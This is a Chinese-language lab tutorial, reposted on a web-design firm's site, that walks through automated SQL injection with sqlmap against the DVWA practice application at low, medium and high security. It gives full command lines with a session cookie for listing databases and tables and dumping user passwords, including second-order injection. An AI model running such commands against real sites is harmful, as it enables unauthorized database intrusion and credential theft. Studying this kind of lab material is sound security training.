Sqlmap自動(dòng)化注入的示例分析

本篇文章給大家分享的是有關(guān)Sqlmap自動(dòng)化注入的示例分析,小編覺(jué)得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話不多說(shuō),跟著小編一起來(lái)看看吧。

創(chuàng)新互聯(lián)長(zhǎng)期為數(shù)千家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開(kāi)放共贏平臺(tái),與合作伙伴共同營(yíng)造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為任丘企業(yè)提供專業(yè)的成都做網(wǎng)站、成都網(wǎng)站設(shè)計(jì),任丘網(wǎng)站改版等技術(shù)服務(wù)。擁有10余年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開(kāi)發(fā)。

使用sqlmap對(duì)dvwa進(jìn)行自動(dòng)化注入
 設(shè)置dvwa級(jí)別為low

  1. 打開(kāi)dvwa的SQL Injection(SQL Injection (Blind)),打開(kāi)瀏覽器調(diào)試,輸入user id并submit,查看攔截到的請(qǐng)求。

  2. 可以看到是一條GET請(qǐng)求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我們直接放到salmap測(cè)試一下,使用-u命令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

  4. 可以看到這里是需要登錄的,否則跑不出來(lái)。所以我們需要添加一個(gè)cookie維持登錄

    6.使用burp suite代理抓包,獲取登錄的cookie,添加--dbs 爆數(shù)據(jù) -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --    cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

       可以看到爆出來(lái)的數(shù)據(jù)庫(kù)是MySQL

      7. 我們用-D xxx指定查看的數(shù)據(jù)庫(kù),用--tables查看該數(shù)據(jù)庫(kù)的所有表:-u            "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

查看跑出來(lái)的結(jié)果:

8.我們用-D xxx -T ttt指定查看的表,用--columns查看表的列

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9.我們用-D xxx查看數(shù)據(jù)庫(kù), -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的數(shù)據(jù)

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump

  • 將dvwa安全等級(jí)調(diào)為medium將抓取的數(shù)據(jù)包保存為.txt文件,放到sqlmap的目錄下,直接-r 文件名 --dbs(后續(xù)的參數(shù)自己添加即可)

  • 將dvwa 安全等級(jí)調(diào)為high。由于這次的提交頁(yè)面跟返回結(jié)果的頁(yè)面不是同一個(gè)頁(yè)面,所以之前的那種方法在這里不能用了。要使用二階注入的方法

  • 提交數(shù)據(jù)的網(wǎng)址             

  • 返回的網(wǎng)址

       將抓取的數(shù)據(jù)包保存為.txt文件,放到sqlmap的目錄下,爆數(shù)據(jù)庫(kù),命令: -r           1.txt --second-url"http://192.168.1.222:8089/vulnerabilities/sqli/" --           batch --level 2 --dbs

       

       爆表名

      -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -        -batch --level 2 -D dvwa --tables

      

      爆列名

      -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" 

     -- batch --level 2 -D dvwa -T user --columns

     

     爆字段數(shù)據(jù)

   -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --       batch --level 2 -D dvwa -T users -C user,password --dump

   

  • 一些概念問(wèn)題:

  • 二階注入:二階sql注入--second-order有些時(shí)候注入點(diǎn)輸入的數(shù)據(jù)看返回結(jié)果的時(shí)候并不是 當(dāng)前的頁(yè)面,而是另外的一個(gè)頁(yè)面, 這時(shí)候就需要你指定到哪個(gè)頁(yè)面獲取響應(yīng)判斷真假。–second-url 后面跟一個(gè)返回的頁(yè)面的URL地址

  • --batch:自動(dòng)默認(rèn)配置,不用手動(dòng)按yes or no

  • level :Sqlmap一共有5個(gè)探測(cè)等級(jí),默認(rèn)是1。等級(jí)越高,說(shuō)明探測(cè)時(shí)使用的payload也越多。其中5級(jí)的payload最多,會(huì)自動(dòng)破解出cookie、XFF等頭部注入。當(dāng)然,等級(jí)越高,探測(cè)的時(shí)間也越慢。這個(gè)參數(shù)會(huì)影響測(cè)試的注入點(diǎn),GET和POST的數(shù)據(jù)都會(huì)進(jìn)行測(cè)試,HTTP cookie在level為2時(shí)就會(huì)測(cè)試,HTTP  User-Agent/Referer頭在level為3時(shí)就會(huì)測(cè)試。在不確定哪個(gè)參數(shù)為注入點(diǎn)時(shí),為了保證準(zhǔn)確性,建議設(shè)置level為5(速度也隨之變慢)

以上就是Sqlmap自動(dòng)化注入的示例分析,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

文章標(biāo)題:Sqlmap自動(dòng)化注入的示例分析
標(biāo)題鏈接:http://bm7419.com/article4/jdseoe.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供外貿(mào)網(wǎng)站建設(shè)、品牌網(wǎng)站制作、網(wǎng)站制作全網(wǎng)營(yíng)銷推廣、建站公司、標(biāo)簽優(yōu)化

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

網(wǎng)站優(yōu)化排名